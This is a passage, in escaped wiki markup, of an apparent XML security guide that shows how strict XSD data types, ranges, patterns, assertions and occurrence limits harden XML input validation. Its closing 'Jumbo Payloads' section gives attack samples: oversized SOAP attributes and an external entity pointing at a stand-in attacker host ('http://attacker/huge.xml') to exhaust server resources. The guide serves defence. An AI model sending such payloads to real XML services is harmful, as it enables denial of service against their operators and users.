The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
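&lt;br /&gt;
As a hedged sketch of how another schema language could express the missing constraints, the same document might be described with an XML Schema. The bounds used here (a name of 1 to 256 characters and an age between 0 and 150) are assumptions chosen for illustration only:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;person&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;!-- assumed length limits for a name --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:minLength value=&amp;quot;1&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:maxLength value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;age&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:nonNegativeInteger&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;!-- assumed upper bound for an age --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:maxInclusive value=&amp;quot;150&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Validated against a schema like this one, the one-million-digit &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; would be rejected before it reaches the application.&lt;br /&gt;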
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the 16 hexadecimal characters. To exemplify this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the result valid. The first portion of this data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions are only partially set for the element, which suggests that the information is tested by application code instead of the proposed sample schema.&lt;br /&gt;
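&lt;br /&gt;
For the hexadecimal case mentioned at the start of this section, a minimal sketch could rely on the built-in &amp;lt;tt&amp;gt;xs:hexBinary&amp;lt;/tt&amp;gt; type instead of a restricted string. The element name &amp;lt;tt&amp;gt;token&amp;lt;/tt&amp;gt; and the size of 16 octets are hypothetical:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;token&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:hexBinary&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;!-- assumed size: for hexBinary, length counts octets, so 16 octets are 32 hexadecimal characters --&amp;gt;&lt;br /&gt;
    &amp;lt;xs:length value=&amp;quot;16&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;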
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting the &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, it might allow a negative result on the user’s account if an attacker provides a negative number. To avoid that logical vulnerability, the data type should probably be &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
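&lt;br /&gt;
As a sketch of a stricter declaration, the &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; element could use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; together with an upper bound. The limit of 100 is an assumed business rule, not part of the original example:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;quantity&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:positiveInteger&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;!-- assumed maximum order size --&amp;gt;&lt;br /&gt;
    &amp;lt;xs:maxInclusive value=&amp;quot;100&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;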
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever user-controlled values are used as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. XML schemas offer data types that exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element.&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If a data type that permits zero is used instead, a zero denominator may trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These possibilities may be useful to express certain values, but they are sometimes misused. The problem is that they are commonly used to express only real numbers such as prices. This is a common error seen in other programming languages, not solely restricted to these technologies.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;'''xs:decimal'''&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
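With this schema, a price set to Infinity or NaN cannot trigger errors in the application, because these values are not valid for the &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; data type and the document is rejected. An attacker can exploit this issue if those values are allowed.&lt;br /&gt;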
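&lt;br /&gt;
To illustrate the difference, the following hypothetical message would be accepted if &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; were declared as &amp;lt;tt&amp;gt;xs:float&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;xs:double&amp;lt;/tt&amp;gt;, but it fails validation against the schema above because &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; is not a legal &amp;lt;tt&amp;gt;xs:decimal&amp;lt;/tt&amp;gt; value:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;'''NaN'''&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;1&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;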
&lt;br /&gt;
=== General Data Restrictions ===&lt;br /&gt;
After selecting the appropriate data type, developers may apply additional restrictions. Sometimes only a certain subset of values within a data type will be considered valid.&lt;br /&gt;
&lt;br /&gt;
==== Prefixed Values ====&lt;br /&gt;
Certain types of values should be restricted to specific sets: traffic lights have only three colors, only 12 months are available, and so on. The schema can put these restrictions in place for each element or attribute. This is the ideal whitelist scenario for an application: only specific values will be accepted. Such a constraint is called &amp;lt;tt&amp;gt;enumeration&amp;lt;/tt&amp;gt; in XML schema. The following example restricts the contents of the element &amp;lt;tt&amp;gt;month&amp;lt;/tt&amp;gt; to 12 possible values:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;month&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;January&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;February&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;March&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;April&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;May&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;June&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;July&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;August&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;September&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;October&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;November&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''enumeration''' value=&amp;quot;December&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
By limiting the month element’s value to any of the previous values, the application will not be manipulating random strings.&lt;br /&gt;
&lt;br /&gt;
==== Ranges ====&lt;br /&gt;
Software applications, databases, and programming languages normally store information within specific ranges. Whenever using an element or an attribute in locations where certain specific sizes matter (to avoid overflows or underflows), it would be logical to check whether the data length is considered valid. The following schema could constrain a name using a minimum and a maximum length to avoid unusual scenarios:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minLength''' value=&amp;quot;3&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
In cases where the values must have an exact length (for example, 8), the length can be specified as follows:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''length''' value=&amp;quot;8&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
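&lt;br /&gt;
Numeric values can be bounded in a similar way with the &amp;lt;tt&amp;gt;minInclusive&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxInclusive&amp;lt;/tt&amp;gt; facets. The &amp;lt;tt&amp;gt;day&amp;lt;/tt&amp;gt; element below is a hypothetical example used only to sketch the idea:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;day&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;!-- assumed range: day of the month --&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''minInclusive''' value=&amp;quot;1&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''maxInclusive''' value=&amp;quot;31&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;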
&lt;br /&gt;
==== Patterns ====&lt;br /&gt;
Certain elements or attributes may follow a specific syntax. You can add &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; restrictions when using XML schemas. When you want to ensure that the data complies with a specific pattern, you can create a specific definition for it. Social security numbers (SSN) may serve as a good example; they must use a specific set of characters, a specific length, and a specific &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt;:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;SSN&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:token&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{3}-[0-9]{2}-[0-9]{4}&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Only values between &amp;lt;tt&amp;gt;000-00-0000&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;999-99-9999&amp;lt;/tt&amp;gt; will be allowed for an SSN.&lt;br /&gt;
&lt;br /&gt;
==== Assertions ====&lt;br /&gt;
Assertion components constrain the existence and values of related elements and attributes on XML schemas. An element or attribute will be considered valid with regard to an assertion only if the test evaluates to true without raising any error. The variable &amp;lt;tt&amp;gt;$value&amp;lt;/tt&amp;gt; can be used to reference the contents of the value being analyzed. &lt;br /&gt;
The ''Divide by Zero'' section above referenced the potential consequences of using data types containing the zero value for denominators, proposing a data type containing only positive values. An opposite example would consider valid the entire range of numbers except zero. To avoid disclosing potential errors, values could be checked using an &amp;lt;tt&amp;gt;assertion&amp;lt;/tt&amp;gt; disallowing the number zero:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;xs:integer&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:'''assertion''' test=&amp;quot;$value != 0&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The assertion guarantees that the &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; will not contain the value zero as a valid number and also allows negative numbers to be a valid denominator.&lt;br /&gt;
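&lt;br /&gt;
Assertions are an XSD 1.1 feature, so processors limited to XSD 1.0 will not evaluate them. As a possible alternative for such processors, the same set of values (every integer except zero) can be sketched as a union of two built-in types:&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;!-- negative or positive integers, which leaves out zero --&amp;gt;&lt;br /&gt;
   &amp;lt;xs:'''union''' memberTypes=&amp;quot;xs:negativeInteger xs:positiveInteger&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;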
&lt;br /&gt;
==== Occurrences ====&lt;br /&gt;
Not defining a maximum number of occurrences can have severe consequences when an application receives an extreme number of items to process. Two attributes specify minimum and maximum limits: &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt;. The default value for both the &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; attributes is &amp;lt;tt&amp;gt;1&amp;lt;/tt&amp;gt;, but certain elements may require other values. For instance, if a value is optional, it could contain a &amp;lt;tt&amp;gt;minOccurs&amp;lt;/tt&amp;gt; of 0, and if there is no limit on the maximum amount, it could contain a &amp;lt;tt&amp;gt;maxOccurs&amp;lt;/tt&amp;gt; of &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;, as in the following example:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;operation&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''unbounded'''&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:all&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) number of &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; elements. This is a common finding, since developers do not normally want to restrict the maximum number of occurrences. Applications using limitless occurrences should test what happens when they receive an extremely large number of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
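&lt;br /&gt;
As an illustration, the &amp;lt;tt&amp;gt;buy&amp;lt;/tt&amp;gt; declaration could carry an explicit limit. The value 100 is an arbitrary assumption; a real limit should come from testing how many elements the application can process:&lt;br /&gt;
 &amp;lt;!-- assumed limit of 100 purchases per operation --&amp;gt;&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;buy&amp;quot; '''maxOccurs'''=&amp;quot;'''100'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:all&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:all&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;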
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot; XMLNS:EXT=&amp;quot;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''http://attacker/huge.xml'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
